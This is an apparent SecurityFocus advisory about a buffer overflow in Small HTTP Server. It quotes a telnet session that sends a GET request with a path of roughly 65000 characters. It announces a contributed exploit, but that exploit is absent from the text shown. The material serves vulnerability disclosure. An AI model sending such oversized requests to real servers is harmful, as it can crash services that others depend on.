Small HTTP Server Buffer Overflow Vulnerability

As taken from the USSR advisory on this vulnerability:


[hellme@die-communitech.net$ telnet example.com 80
Trying example.com...
Connected to example.com.
Escape character is '^]'.
GET /[buffer]

Where [buffer] is aprox. 65000 characters.


Prizm <prizm@Resentment.org> has also provided the following exploit:


 

Privacy Statement
Copyright 2010, SecurityFocus